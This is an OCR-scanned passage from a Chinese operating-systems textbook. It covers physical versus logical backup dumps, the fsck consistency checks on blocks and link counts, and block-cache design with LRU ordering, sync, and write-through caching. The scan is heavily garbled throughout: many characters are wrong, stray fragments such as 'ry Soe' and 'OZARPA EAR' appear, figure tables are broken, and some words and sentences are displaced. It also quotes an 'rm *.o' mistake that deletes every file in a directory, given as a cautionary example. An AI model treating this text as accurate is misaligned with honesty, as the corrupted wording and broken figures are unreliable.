这 个 原因 ， 所 以 备份 磁带 应 该 远离 现场 存放 ， 不 过 这 又 带 来 了 更 多 的 安 
全 风险 《因为 ， 现 在 必须 保护 两 个 地 点 了 ) 。 关 于 此 问题 和 管理 中 的 其 
他 实际 问题 ， 请 参考 (Nemeth A, 2000) 。 接 下 来 我 们 只 讨论 文件 系 
统 备 份 所 涉及 的 技术 问题 。 








转 储 磁盘 到 磁带 上 有 两 种 方案 ， 物 理 转 储 和 逻辑 转 储 。 物 理 转 储 是 
从 磁盘 的 第 0 块 开 始 ， 将 全 部 的 磁盘 块 按 序 输出 到 磁带 上 ， 直 到 最 后 一 
块 复制 完毕 。 此 程序 很 简单 ， 可 以 确保 万 无 一 失 ， 这 是 其 他 任何 实用 程 
序 所 不 能 比 的 。 


不 过 有 几 点 关于 物理 转 储 的 评价 还 是 值得 一 提 的 。 首 先 ， 未 使 用 的 


磁盘 块 无 须 备 份 。 如 果 转 储 程 序 能 够 得 到 访问 空 采 块 的 数据 结构 ， 就 可 
以 避免 该 程序 备份 未 使 用 的 磁盘 块 。 但 是 ， 既 然 磁带 上 的 第 k 抉 并 不 代 
表 和 磁盘 上 的 第 k 块 ， 那 么 要 想 略 过 未 使 用 的 磁盘 块 就 需要 在 每 个 磁盘 块 
前 边 写 下 该 磁盘 块 的 号 码 〈 或 其 他 等 效 数 据 ) 。 





第 二 个 需要 关注 的 是 坏 块 的 转 储 。 制 造 大 型 磁盘 而 没有 任何 瑕 瘟 几 
乎 是 不 可 能 的 ， 总 是 有 一 些 坏 块 存在 。 有 时 进行 低级 格式 化 后 ， 坏 块 会 
被 检测 出 来 ， 标 记 为 坏 的 ， 并 被 应 对 这 种 紧急 状况 的 在 每 个 轨道 末端 的 
一 些 空闲 块 所 葵 换 。 在 很 多 情况 下 ， 磁 盘 控 制 嚣 处理 坏 块 的 蔡 换 过 程 是 
透明 的 ， 甚 至 操作 系统 也 不 知道 。 





然而 ， 有 时 格式 化 后 块 也 会 变 坏 ， 在 这 种 情况 下 操作 系统 可 以 检测 
到 和 它们。 通常 ， 可 以 通过 建立 一 个 包含 所 有 坏 块 的 "文件 来 解决 这 个 问 
只 要 确保 它们 不 会 出 现在 空闲 块 池 中 并 且 雇 不 会 被 分 配 。 不 用 
说 ， 这 个 文件 是 完全 不 能 够 读 取 的 。 


题 








如 采 磁 盘 控 制 器 将 所 有 坏 块 重新 映射 ， 并 对 操作 系统 隐藏 的 话 ， 物 
理 转 储 工作 还 是 能 够 顺利 进行 的 。 男 一 方面 ， 如 果 这 些 坏 块 对 操作 系统 
可 见 并 映射 到 在 一 个 或 几 个 坏 块 文件 或 者 位 图 中 ， 那 么 在 转 储 过 程 中 ， 
物理 转 储 程序 绝对 有 必要 能 访问 这 些 信 息 ， 并 避免 转 储 之 ， 从 而 防止 在 
对 坏 块 文 件 备 份 时 的 无 止境 磁盘 读 错误 发 生 。 


物理 转 储 的 主要 优点 是 简单 、 极 为 快速 (基本 上 是 以 磁盘 的 速度 运 


T) 。 主 要 缺点 是 ， 既 不 能 跳 过 选 定 的 目录 ， 也 无 法 增 量 转 储 ， 还 不 能 
满足 恢复 个 人 文件 的 请 求 。 正 因 如 此 ， 绝 大 多 数 配置 都 使 用 多 辑 转 储 。 


~ 
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日 期 例如， 最 近 一 次 增 量 转 储 或 全 面 系统 转 储 的 日 期 ) 后 有 所 更 改 的 
全 部 文件 和 目录 。 所 以 ， 在 逻辑 转 储 中 ， 转 储 磁带 上 会 有 一 连 串 精心 标 
识 的 目录 和 文件 ， 这 样 就 很 容易 满足 恢复 特定 文件 或 目录 的 请 求 。 











既然 逻辑 转 储 是 最 为 普遍 的 形式 ， 束 让 我 们 以 图 4-25 为 例 来 仔细 研 
完 一 个 通用 算法 。 该 算法 在 UNIX 系 统 上 广 为 使 用 。 在 图 中 可 以 看 到 一 
棵 由 目录 ( 方 框 》 和 文件 (圆圈 组 成 的 文件 树 。 被 阴影 履 盖 的 项 目 代 
表 目 基准 日 期 以 来 修改 过 ， 因 此 需要 转 储 ， 无 阴影 的 则 不 需要 转 储 。 
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图 425 待 转 储 的 文件 系统 ， 其 中 方 框 代 表 目 录 ， 圆 圈 代 表 文 件 。 被 


阴影 覆盖 的 项 目 表示 自 上 次 转 储 以 来 修改 过 。 每 个 目录 和 文件 都 被 标 上 


其 i 节点 号 





该 算法 还 转 储 通 疝 修改 过 的 文件 或 目录 的 路 径 上 的 所 有 目录 (其 至 
包括 未 修改 的 目录 ) ， 原 因 有 二 。 其 一 是 为 了 将 这 些 转 储 的 文件 和 目录 
恢复 到 妃 一 台 计 算 机 的 新 文件 系统 中 。 这 样 ， 转 储 程序 和 恢复 程序 就 可 
以 在 计算 机 之 间 进 行文 件 系 统 的 整体 转移 。 











转 储 被 修改 文件 之 上 的 未 修改 目录 的 第 二 个 原因 是 为 了 可 以 对 单个 
文件 进行 增 量 恢复 〈 很 可 能 是 对 思春 操作 所 损坏 文件 的 恢复 ) 。 设 想 如 
果 星 期 天 晚上 转 储 了 整个 文件 系统 ， 星 期 一 晚上 又 做 了 一 次 增 量 转 储 。 
在 星期 二 ，/usr/jhs/proj/nr3 目 录 及 其 下 的 全 部 目录 和 文件 被 删除 了 。 星 
期 三 一 大 早 用 户 又 想 恢 复 /usr/jhs/proj/nr3/plans/summary 文 件 。 但 因为 没 
有 设置 ， 所 以 不 可 能 单独 恢复 summary 文 件 。 必 须 首先 恢复 nr3 和 plans 这 
两 个 目录 。 为 了 正确 获取 文件 的 所 有 者 、 模 式 、 时 间 等 各 种 信息 ， 这 些 











目录 当然 必须 再 次 备份 到 转 储 磁带 上 ， 尽 管 自 上 次 完整 转 储 以 来 它们 并 
没有 修改 过 。 


逻辑 转 储 算法 要 维持 一 个 以 i 节 点 号 为 索引 的 位 图 ， 每 个 i 贡 点 包含 
了 儿 位 。 随 大 算 法 的 执行 ， 位 图 中 的 这 些 位 会 被 设置 或 清除 。 算 法 的 执 
行 分 为 四 个 阶段 。 第 一 阶段 从 起 始 目 录 〈 本 例 中 为 根 目 录 〉 开始 检 查 其 
中 的 所 有 目录 项 。 对 每 一 个 修改 过 的 文件 ， 该 算法 将 在 位 图 中 标记 其 i 
节点 。 算 法 还 标记 并 递归 检查 每 一 个 目录 不管 是 否 修 改过 ) 。 

















阶段 结束 时 ， 所 有 修改 过 的 文件 和 全 部 目录 都 在 位 图 中 标记 
了 ， 如 图 4-26a 所 示 《 以 阴影 标记 ) 。 理 论 上 说 来 ， 第 二 阶段 再 次 递归 
地 遍历 目录 树 ， 并 去 掉 目 录 树 中 任何 不 包含 被 修改 过 的 文件 或 目录 的 目 
录 上 的 标记 。 本 阶段 的 执行 结果 如 图 4-26b 所 示 。 注 意 ，i 节 点 号 为 10、 
11、14、27、29 和 30 的 目录 此 时 已 经 被 去 掉 标 记 ， 因 为 它们 所 包含 的 内 
容 没 有 做 任何 修改 。 它 们 因而 也 不 会 被 转 储 。 相 反 ，i 节 点 写 为 5 和 6 的 
目录 尽管 没有 被 修改 过 也 要 被 转 储 ， 因 为 到 新 的 机 器 上 恢复 当日 的 修改 
时 需要 这 些 信息 。 为 了 提高 算法 效率 ， 可 以 将 这 两 阶段 的 目录 树 壳 历 合 
ry Soe 
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现在 哪些 目录 和 文件 必须 被 转 储 已 经 很 明确 了 ， 就 是 图 4-26b 中 所 
标记 的 部 分 。 第 三 阶段 算法 将 以 节点 号 为 序 ， 扫 描 这 些 放 点 并 转 储 所 
有 标记 的 目录 ， 如 图 4-26c 所 示 。 为 了 进行 恢复 ， 每 个 被 转 储 的 目录 都 
用 目录 的 属性 (所 有 者 、 时 间 等 ) 作 为 前 级 。 最 后 ， 在 第 四 阶段 ， 在 图 
4-26d 中 被 标记 的 文件 也 被 转 储 ， 同 样 ， 由 其 文件 属性 作为 前 绥 。 











此 ， 转 储 结 


从 转 储 磁带 上 恢复 文件 系统 很 容易 办 到 。 痛 先 要 在 磁盘 上 创建 一 个 
空 的 文件 系统 ， 然 后 恢复 最 近 一 次 的 完整 转 储 。 由 于 磁 和 市 上 最 先 出 现 目 
录 ， 所 以 首先 恢复 目录 ， 给 出 文件 系统 的 框架 ; 然后 恢复 文件 本 里 。 在 
完整 转 储 之 后 的 是 增 量 转 储 ， 重 复 这 一 过 程 ， 以 此 类 推 。 











尽管 逻辑 转 储 十 分 简单 ， 还 是 有 几 点 棘手 之 处 。 首 先 ， 既 然 空闲 块 
列表 并 不 是 一 个 文件 ， 那 么 在 所 有 被 转 储 的 文件 恢复 完毕 之 后 ， 就 需要 
从 零 开 始 重 新 构造 。 这 一 点 可 以 办 到 ， 因 为 全 部 空闲 块 的 集合 恰好 是 包 
含 在 全 部 文件 中 的 块 集合 的 补 集 。 





为 一 个 问题 是 关于 连接 。 如 果 一 个 文件 被 连接 到 两 个 或 多 个 目录 
中 ， 要 注意 在 恢复 时 只 对 该 文件 恢复 一 次 ， 然 后 要 恢复 所 有 指向 该 文件 
的 目录 。 














还 有 一 个 问题 束 是 : UNIX 文 件 实 际 上 包含 了 许多 "空洞 ”。 打 开 文 
件 ， 写 几 个 字 节 ， 然 后 找到 文件 中 一 个 偶 移 了 一 定 距 离 的 地 址 ， 又 写 入 
更 多 的 字 节 ， 这 么 做 是 合法 的 。 但 两 者 之 间 的 这 些 块 并 不 属于 文件 本 
号 ， 从 而 也 不 应 该 在 其 上 实施 转 储 和 恢复 操作 。 核 心 文件 通常 在 数据 段 
和 堆栈 段 之 间 有 一 个 数 百 兆 字 节 的 空洞 。 如 有 果 处 理 不 得 当 ， 每 个 被 恢复 
的 核心 文件 会 以 “0 填充 这 些 区 域 ， 这 可 能 导致 该 文件 与 虚拟 地 址 空间 
一 样 大 例如 ，2”* 字 节 ， 更 糟 料 可 能 会 达到 2 中 字 节 )。 











最 后 ， 无 论 属于 哪 一 个 目录 (它们 并 不 一 定局 限于 /dev 目 录 下 )， 
特殊 文件 、 命 名 管道 以 及 类 似 的 文件 都 不 应 该 转 储 。 关 于 文件 系统 备份 
的 更 多 信息 ， 请 参考 (Chervenak 等 人 ，1998;Zwicky，1991) 。 








磁带 密度 不 会 像 磁盘 密度 那样 改进 得 那么 快 。 这 会 逐渐 导致 备份 一 
个 很 大 的 磁盘 需要 多 个 磁带 的 状况 。 当 磁带 机 器 人 可 以 目 动 换 磁 融 时 ， 
如 果 这 种 趋势 继续 下 去 ， 作 为 一 种 备份 介质 ， 碰 融会 最 终 变 得 太 小 。 在 
那 种 情况 下 ， 备 份 一 个 磁盘 的 惟一 的 方式 是 在 另 一 个 磁盘 上 。 对 每 一 个 
磁盘 直接 做 镜像 是 一 种 方式 。 一 个 更 加 复杂 的 方案 ， 称 为 RAID， 将 会 


在 第 5 章 讨 论 。 





4.4.3 文件 系统 的 一 致 性 


影响 文件 系统 可 徘 性 的 妨 一 个 问题 是 文件 系统 的 一 致 性 。 很 多 文件 
系统 读 取 磁 盘 块 ， 进 行 修改 后 ， 再 写 回 磁盘 。 如 末 在 修改 过 的 磁盘 块 全 
部 写 回 之 前 系统 衣 误 ， 则 文件 系统 有 可 能 处 于 不 一 致 状态 。 如 果 一 些 未 
被 写 回 的 块 是 i 节 点 块 、 目 录 块 或 者 是 包含 有 空闲 表 的 块 时 ， 这 个 问题 
尤为 严重 。 








为 了 解决 文件 系统 的 不 一 致 问题 ， 很 多 计算 机 都 带 有 一 个 实用 程序 
以 检验 文件 系统 的 一 致 性 。 例 如 ，UNIX 有 fsck， 而 Windows 用 
scandisk。 系 统 局 动 时 ， 特 别 是 裔 误 之 后 的 重新 启动 ， 可 以 运行 该 实用 
程序 。 下 面 我 们 介绍 在 UNIX 中 这 个 fsck 实 用 程序 是 怎样 工作 的 。 
scandisk 有 上 所 不 同 ， 因 为 它 工 作 在 另 一 种 文件 系统 上 ， 不 过 运用 文件 系 
统 的 内 在 见 余 进 行 修复 的 一 般 原理 仍然 有 效 。 所 有 文件 系统 检验 程序 可 
以 独立 地 检验 每 个 文件 系统 (磁盘 分 区 )〉 的 一 致 性 。 





一 致 性 检查 分 为 两 种 ， 块 的 一 致 性 检查 和 文件 的 一 致 性 检查 。 在 检 
查 块 的 一 致 性 时 ， 程 序 构造 两 张 表 ， 每 张 表 中 为 每 个 块 设立 一 个 计数 
器 ， 都 初始 化 为 0。 第 一 个 表 中 的 计数 器 跟踪 该 块 在 文件 中 的 出 现 次 
数 ， 第 二 个 表 中 的 计数 器 跟踪 该 块 在 空闲 表 中 的 出 现 次 数 。 














接 看 检验 程序 使 用 原始 设备 读 取 全 部 的 节点， 忽略 文件 的 结构 ， 


只 返回 所 有 的 磁盘 块 ， 从 0 开始 。 由 ji 节点 开始 ， 可 以 建立 相应 文件 中 采 
用 的 全 部 块 的 块 号 表 。 每 当 读 到 一 个 块 号 时 ， 该 块 在 第 一 个 表 中 的 计数 
融 加 1。 然 后 ， 该 程序 检查 空闲 表 或 位 图 ， 碍 找 全 部 未 使 用 的 块 。 每 当 
在 空 闪 表 中 找到 一 个 块 时 ， 就 会 使 它 在 第 二 个 表 中 的 相应 计数 器 加 1。 











如 琳 文 件 系 统一 怪 ， 则 每 一 块 或 者 在 第 一 个 表 计 数 器 中 为 1， 或 者 
在 第 二 个 表 计 数 器 中 为 1， 如 图 4-27a 所 示 。 但 是 当 系统 月 让 后， 这 两 张 
表 可 能 如 图 4-27b 所 示 ， 其 中 ， 磁 盘 块 2 没有 出 现在 任何 一 张 表 中 ， 这 称 
为 块 丢失 。 尽 管 块 丢 失 不 会 造成 实际 的 损害 ， 但 筷 的 确 溪 费 了 磁盘 空 
间 ， 减 少 了 磁盘 容量 。 块 丢失 问题 的 解决 很 容易 : 文件 系统 检验 程序 把 
它们 加 到 空闲 表 中 即 可 。 


有 可 能 出 现 的 另 一 种 情况 如 图 4-27c 所 示 。 其 中 ， 块 4 在 空闲 表 中 出 
现 了 2 次 《只 在 空闲 表 是 真正 意义 上 的 一 张 表 时 ， 才 会 出 现 重 复 ， 在 位 
图 中 ， 不 会 发 生 这 类 情况 ) 。 解 决 方法 也 很 简单 : 只 要 重新 建立 空闲 表 
BI FY 。 











最 糟 的 情况 是 ， 在 两 个 或 多 个 文件 中 出 现 同一 个 数据 块 ， 如 图 4- 
27d 中 的 块 5。 如 果 其 中 一 个 文件 被 删除 ， 块 5 会 添加 到 空间 表 中 ， 导 致 
一 个 块 同 时 处 于 使 用 和 空闲 两 种 状态 。 知 删除 这 两 个 文件 ， 那 么 在 空闲 
表 中 这 个 磁盘 块 会 出 现 两 次 。 


块 号 


01234567 8 9101112131415 
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c) 


块 号 
0123456789101112131415 
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d) 


图 4-27 文件 系统 状态 : Jg; DRAR; 


重复 数据 块 


OZARPA EAR; d) 


文件 系统 检验 程序 可 以 采取 相应 的 处 理 方法 是 ， 先 分 配 一 空间 块 ， 
把 块 5 中 的 内 容 复 制 到 空 用 块 中 ， 然 后 把 它 插 到 其 中 一 个 文件 之 中 。 这 
样 文件 的 内 容 未 改变 (虽然 这 些 内 容 几 乎 可 以 上 月 定 是 不 对 的 ) ， 但 至 少 
保持 了 文件 系统 的 一 致 性 。 这 一 错误 应 该 报告 ， 由 用 户 检查 文件 受 损 情 
况 。 














除 检查 每 个 磁盘 块 计 数 的 正确 性 之 外 ， 文 件 系统 检验 程序 还 检查 目 
录 系 统 。 此 时 也 要 用 到 一 张 计数 占 表 ， 但 这 时 是 一 个 文件 (而 不 是 一 个 
ER) 对 应 于 一 个 计数 项 。 程 序 从 根 目 录 开 始 检 验 ， 沿 着 目录 树 递 归 下 
降 ， 检 查 文 件 系 统 中 的 每 个 目录 。 对 每 个 目录 中 的 每 个 文件 ， 将 文件 使 
用 计数 器 加 1。 要 注意 ， 由 于 存在 硬 连接 ， 一 个 文件 可 能 出 现在 两 个 或 
多 个 目录 中 。 而 遇 到 符号 连接 是 不 计数 的 ， 不 会 对 目标 文件 的 计数 器 加 














在 检验 程序 全 部 完成 后 ， 得 到 一 张 由 i 市 反 号 索引 的 表 ， 说 明 每 个 
文件 被 多 少 个 目录 包含 。 然 后 ， 检 验 程序 将 这 些 数字 与 存储 在 文件 i 节 
扩 中 的 连接 数目 相 比 较 。 当 文件 创建 时 ， 这 些 计数 器 从 1 开始 ， 随 着 每 
次 对 文件 的 一 个 ( 硬 ) 连接 的 产生 ， 对 应 计数 器 加 1。 如 果 文 件 系统 一 
致 ， 这 两 个 计数 应 相等 。 但 是 ， 有 可 能 出 现 两 种 错误 ， 即 i 市 点 中 的 连 
接 计 数 太 大 或 者 太 小 。 








如 果 i 点 的 连接 计数 大 于 目录 项 个 数 ， 这 时 即使 所 有 的 文件 都 从 
目录 中 删除 ， 这 个 计数 仍 是 非 0，i 市 点 不 会 被 删除 。 该 错误 并 不 严重 ， 
却 因为 存在 不 属于 任何 目录 的 文件 而 浪费 了 磁盘 空间 。 为 改正 这 一 错 
误 ， 可 以 把 i 市 点 中 的 连接 计数 设 成 正确 值 。 








男 一 种 错误 则 是 潜在 的 灾难 。 如 果 同 一 个 文件 连接 两 个 目录 项 ， 但 
其 i 点 连接 计数 只 为 1， 如 果 删 除了 任何 一 个 目录 项 ， 对 应 i 节 点 连接 计 
数 变 为 0。 当 i 节操 计 数 为 0 时 ， 文 件 系 统 标志 该 i 节操 为 “未 使 用 ”， 并 释 
放 其 全 部 块 。 这 会 导致 其 中 一 个 目录 指向 一 未 使 用 的 节点， 而 很 有 可 
能 其 块 号 上 就 被 分 配给 其 他 文件 。 解 决 方法 同样 是 把 i 节点 中 连接 计数 
设 为 目录 项 的 实际 个 数值 。 











由 于 效率 上 的 考虑 ， 以 上 的 块 检 枉 和 目录 检查 经 党 被 集成 到 一 起 
《 即 仅 对 i 市 点 扫描 一 这) 。 当 然 也 有 一 些 其 他 检查 方法 。 例 如 ， 目 录 





是 有 明确 格式 的 ， 包 含有 i 节点 数目 和 ASCII 文 件 名 ， 如 果 某 个 目录 的 i 节 
扩编 写 大 于 磁盘 中 i 市 点 的 实际 数目 ， 说 明 这 个 目录 被 破坏 了 。 





再 有 ， 每 个 i 节 点 都 有 一 个 访问 权限 项 。 一 些 访问 权限 是 合法 的 ， 

但 是 很 怪异 ， 比 如 0007， 它 不 允许 文件 所 有 者 及 所 在 用 户 组 的 成 员 进 行 
访问 ， 而 其 他 的 用 户 却 可 以 读 、 写 、 执 行 此 文件 。 在 这 类 情况 下 ， 有 必 
要 报告 系统 已 经 设置 了 其 他 用 户 权限 高 于 文件 所 有 者 权限 这 一 情况 。 拥 
有 1000 多 个 目录 项 的 目录 也 很 可 疑 。 为 超级 用 户 所 拥有 ， 但 放 在 用 户 目 
录 下 ， 且 设置 了 SETUID 位 的 文件 ， 可 能 也 有 安全 问题 ， 因 为 任何 用 户 
执行 这 类 文件 都 需要 超级 用 户 的 权限 。 可 以 列 出 一 长 串 特殊 的 情况 ， 尽 
管 这 些 情况 合法 ， 但 报告 给 用 户 却 是 有 必要 的 。 











以 上 讨论 了 防止 因 系统 朋 浊 而 破坏 用 户 文件 的 问题 ， 茶 一 些 文 件 系 
统 也 防止 用 户 上 自身 的 误 操 作 。 如 果 用 户 想 输 入 
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rm *.0 











注意 ， 星 号 后 面 有 一 空格 ) ， 则 rm 命令 会 删除 全 部 当前 目录 中 的 
文件 ， 然 后 报告 说 找 不 到 文件 .o。 在 MS-DOS 和 一 些 其 他 系统 中 ， 文 件 











的 删除 仅仅 是 在 对 应 目录 或 i 贡 点 上 设置 某 一 位 ， 表 示 文 件 被 删除 ， 并 

没有 把 磁盘 块 返 回 到 空闲 表 中 ， 直 到 确实 需要 时 才 这 样 做 。 所 以 ， 如 采 
用 户 立 即 发 现 了 操作 错误 ， 可 以 运行 特定 的 一 个 “撤销 删除 ”〈 即 恢复 ) 

实用 程序 恢复 被 删除 的 文件 。 在 windows 中 ， 删 除 的 文件 被 转移 到 回收 
站 目录 中 《一 个 特别 的 目录 ) ， 稍 后 知 需要 ， 可 以 从 那里 还 原文 件 。 当 
然 ， 除 非 文件 确实 从 回收 站 目录 中 删除 ， 人 否则 不 会 释放 空间 。 





4.4.4 文件 系统 性 能 





访问 磁盘 比 访问 内 存 慢 得 多 。 读 内 存 中 一 个 32 位 字 大 概要 10ns。 从 
硬盘 上 读 的 速度 大 约 超过 100MB/s， 对 32 位 字 来 说 ， 大 约 要 慢 4 倍 ， 还 
要 加 上 5 一 10ms 寻 道 时 间 ， 并 等 待 所 需 的 扇面 抵达 磁头 下 。 如 果 只 需要 
一 个 字 ， 内 存 访 问 则 比 磁盘 访问 快 百 万 数量 级 。 考 虑 到 访问 时 间 的 这 个 
差异 ， 许 多 文件 系统 采用 了 各 种 优化 措施 以 改善 性 能 。 本 节 我 们 将 介绍 
其 中 三 种 方法 。 








1. 高 速 缓存 





最 常用 的 减少 磁 税 访问 次 数 技术 是 块 高 速 缓存 (block cache) 或 者 
绥 冲 区 高 速 缓存 (buffer cache) 。 在 本 书 中 ， 高 速 缓存 指 的 是 一 系列 的 
块 ， 它 们 在 逻辑 上 属于 磁盘 ， 但 实际 上 基于 性 能 的 考虑 被 保存 在 内 存 
中 。 

















管理 高 速 缓存 有 不 同 的 算法 ， 第 用 的 算法 是 : 检查 全 部 的 读 请 求 ， 
查看 在 高 速 缓存 中 是 否 有 所 需要 的 块 。 如 果 存 在 ， 可 执行 读 操 作 而 无 须 
访问 磁盘 。 如 果 该 其 不 在 高 速 缓存 中 ， 首 先 要 把 它 读 到 高 速 缓存 ， 再 复 
制 到 所 需 地 方 。 之 后 ， 对 同一 个 块 的 请 求 都 通过 高 速 缓存 完成 。 
































高 速 缓存 的 操作 如 图 4-28 所 示 。 由 于 在 高 速 缓存 中 有 许多 块 〈 通 党 





有 上 于 块 ) ， 所 以 需要 有 某 种 方法 快速 确定 所 需要 的 块 是 否 存在 。 篆 用 
方法 是 将 设备 和 磁盘 地 址 进行 散 列 操作 ， 然 后 ， 在 散 列 表 中 查找 结 
具有 相同 散 列 值 的 块 在 一 个 链表 中 连接 在 一 起 ， 这 样 束 可 以 沿 着 冲突 链 
查找 其 他 块 。 

散 列 表 HV Lig (LRU) 后 端 (MRU) 
i 


图 4-28 缓冲 区 高 速 缓存 数据 结构 


如 果 高 速 缓存 已 满 ， 则 需要 调 入 新 的 块 ， 因 此 ， 要 把 原来 的 某 一 块 
调 出 高 速 缓存 〈 如 果 要 调 出 的 块 在 上 次 调 入 以 后 修改 过 ， 则 要 把 它 写 回 
人 磁盘) 。 这 种 情况 与 分 页 非常 相似 ， 所 有 常用 的 页 面 置换 算法 在 第 3 章 
中 已 经 介绍 ， 例 如 FIFO 算 法 、 第 二 次 机 会 算法 、LRU 算 法 等 ， 它 们 都 适 
用 于 高 速 缓存 。 与 分 页 相 比 ， 高 速 缓存 的 好 处 在 于 对 高 速 缓存 的 引用 不 
很 频繁 ， 所 以 按 精 确 的 LRU 顺 序 在 链表 中 记录 全 部 的 块 是 可 行 的 。 














在 图 4-28 中 可 以 看 到 ， 除 了 散 列 表 中 的 冲突 链 之 外 ， 还 有 一 个 双 同 
链表 把 所 有 的 块 按照 使 用 时 间 的 先后 次 友 链 接 起 来 ， 近 来 使 用 最 少 的 块 





在 该 链表 的 前 端 ， 而 近来 使 用 最 多 的 块 在 该 链表 的 后 端 。 当 引用 某 个 块 
时 ， 该 块 可 以 从 双 回 链表 中 移 走 ， 并 放置 到 该 表 的 尾部 去 。 用 这 种 方 
法 ， 可 以 维护 一 种 准确 的 LRU 顺 序 。 


但 是 ， 这 又 带 来 了 意 想不到 的 难题 。 现 在 存在 一 种 情形 ， 使 我 们 有 
可 能 获得 精确 的 LRU， 但 是 碰巧 该 LRU 却 又 不 符合 要 求 。 这 个 问题 与 前 
一 节 讨 论 的 系统 崩溃 和 文件 一 致 性 有 关 。 如 果 一 个 关键 块 〈 比 如 i 节 点 
块 ) 读 进 了 高 速 缓存 并 做 过 修改 ， 但 是 没有 写 回 磁盘 ， 这 时 ， 系 统 骨 涡 
会 导致 文件 系统 的 不 一 致 。 如 果 把 i 节 点 块 放 在 LRU 链 的 尾部 ， 在 它 到 
达 链 首 并 写 回 磁盘 前 ， 有 可 能 需要 相当 长 的 一 段 时 间 。 








此 外 ， 茶 一 些 块 ， 如 i 节点 块 ， 极 少 可 能 在 短 时 间 内 被 引用 两 次 。 
基于 这 些 考虑 需要 修改 LRU 方 案 ， 并 应 注意 如 下 两 点 : 








1) 这 一 块 是 否 不 久 后 会 再 次 使 用 ? 
2) 这 一 块 是 否 关系 到 文件 系统 的 一 致 性 ? 


考虑 以 上 两 个 问题 时 ， 可 将 块 分 为 i 节 点 块 、 间 接 块 、 目 录 块 、 满 
数据 块 、 部 分 数据 块 等 几 类 。 把 有 可 能 最 近 不 再 需要 的 块 放 在 LRU 链 表 
的 前 部 ， 而 不 是 LRU 链 表 的 后 痢 ， 于 是 它们 所 占用 的 缓冲 区 可 以 很 快 被 
重用 。 对 很 快 就 可 能 再 次 使 用 的 块 ， 比 如 正在 写 入 的 部 分 满 数据 块 ， 可 
放 在 链表 的 尾部 ， 这 样 它们 能 在 高 速 缓存 中 保存 较 长 的 一 段 时 间 。 








第 二 个 问题 独立 于 前 一 个 问题 。 如 果 关 系 到 文件 系统 一 致 性 除数 
据 块 之 外 ， 其 他 块 基本 上 都 是 这 样 ) 的 茶 块 被 修改 ， 都 应 立即 将 该 块 写 
回 磁盘 ， 不 管 它 是 否 被 放 在 LRU 链 表 尾 部 。 将 关键 块 快 速写 回 磁盘 ， 将 
大 大 减少 在 计算 机 崩 族 后 文件 系统 被 破坏 的 可 能 性 。 用 尸 的 文件 月 误 
了 ， 访 用户 会 不 高 兴 ， 但 是 如 果 整 个 文件 系统 都 丢失 了 ， 那 么 这 个 用 户 


全 是 人生: 





尽管 用 这 类 方法 可 以 保证 文件 系统 一 致 性 不 受到 破坏 ， 但 我 们 仍然 
不 希望 数据 块 在 高 速 缓存 中 放 很 久之 后 才 写 入 磁盘 。 设 想 某 人 正在 用 个 
人 计算 机 编写 一 本 书 。 尽 管 作者 让 编辑 程序 将 正在 编辑 的 文件 定期 写 回 
磁盘 ， 所 有 的 内 容 只 存在 高 速 缓存 中 而 不 在 磁盘 上 的 可 能 性 仍然 非常 
大 。 如 果 这 时 系统 崩溃 ， 文 件 系 统 的 结构 并 不 会 被 破坏 ， 但 他 一 蓝天 的 
工作 束 会 丢失 。 











即使 只 发 生 几 次 这 类 情况 ， 也 会 让 人 感到 不 愉快 。 系 统 采用 两 种 方 
法 解决 这 一 问题 。 在 UNIX 系 统 中 有 一 个 系统 调用 sync， 它 强制 性 地 把 
全 部 修改 过 的 块 立即 写 回 磁盘 。 系 统 局 动 时 ， 在 后 台 运 行 一 个 通常 名 为 
update 的 程序 ， 它 在 无 限 循环 中 不 断 执 行 sync 调 用 ， 每 两 次 调用 之 间 休 
眠 30s。 于 是 ， 系 统 即使 朋 混 ， 也 不 会 丢失 超过 30 秒 的 工作 。 


虽然 目前 Windows 有 一 个 等 价 于 sync 的 系统 调用 一 -一 
FlushFileBuffers， 不 过 过 去 没有 。 相 反 ，Windows 采 用 一 个 在 某 种 程度 
上 比 UNIX 方 式 更 好 〈 有 时 更 坏 ) 的 策略 。 其 做 法 是 ， 只 要 被 写 进 高 速 





缓存， 就 把 每 个 被 修改 的 块 写 进 磁盘 。 将 缓存 中 所 有 被 修改 的 块 立 即 写 
回 磁盘 称 为 通 写 高 速 缓存 (write-through cache) 。 同 非 通 写 高 速 缓存 相 
比 ， 通 写 高 速 缓存 需要 更 多 的 磁盘 IO。 





知 某 程序 要 写 满 1KB 的 块 ， 每 次 写 一 个 字符 ， 这 时 可 以 看 到 这 两 种 
方法 的 区 别 。UNIX 在 高 速 缓存 中 保存 全 部 字符 ， 并 把 这 个 块 每 30 秒 写 
回 磁 盘 一 次 ， 或 者 当 从 高 速 缓存 删除 这 一 块 时 ， 写 回 磁 盘 。 在 通 写 高 速 
缓存 里 ， 每 写 入 一 字符 就 要 访问 一 次 磁盘 。 当 然 ， 多 数 程序 有 内 部 组 
冲 ， 通 常情 况 下 ， 在 每 次 执行 write 系统 调用 时 并 不 是 只 写 入 一 个 字符 ， 
而 是 写 入 一 行 或 更 大 的 单位 。 








采用 这 两 种 不 同 的 高 速 缓存 策略 的 结果 是 : 在 UNIX 系 统 中 ， 若 不 
调用 sync 就 移动 ( 软 ) 磁盘 ， 往 往 会 导致 数据 丢失 ， 在 被 毁坏 的 文件 系 
统 中 也 经 常 如 此 。 而 在 通 写 高 速 缓存 中 ， 就 不 会 出 现 这 类 情况 。 选 择 不 
同 策略 的 原因 是 ， 在 UNIX 开 发 环境 中 ， 全 部 磁盘 都 是 硬盘 ， 不 可 移 
动 。 而 第 一 代 Windows 文 件 源 自 MS-DOS， 是 从 软盘 世界 中 发 展 起 来 
的 。 由 于 UNIX 方 案 有 更 高 的 效率 它 成 为 当然 的 选择 〈 但 可 靠 性 更 
差 ) ， 随 着 硬盘 成 为 标准 ， 它 目前 也 用 在 Windows 的 磁盘 上 。 但 是 ， 
NTFS 使 用 其 他 方法 (日 志 ) 改善 其 可 靠 性 ， 这 在 前 面 已 经 讨论 过 。 




















一 些 操作 系统 将 高 速 缓存 与 页 缓存 集成 。 这 种 方式 特别 是 在 文 持 内 
存 映 射 文件 的 时 候 很 吸引 人 。 如 果 一 个 文件 被 映射 到 内 存 上 ， 则 它 其 中 
的 一 些 页 就 会 在 内 存 中 ， 因 为 它们 被 要 求 按 页 进入 。 这 些 页 面 与 在 局 速 








绥 存 中 的 文件 块 几 乎 没有 不 同 。 在 这 种 情况 下 ， 它 们 能 被 以 同样 的 方式 
来 对 待 ， 也 就 是 说 ， 用 一 个 缓存 来 同时 存储 文件 块 与 页 。 


2. 块 所 前 读 


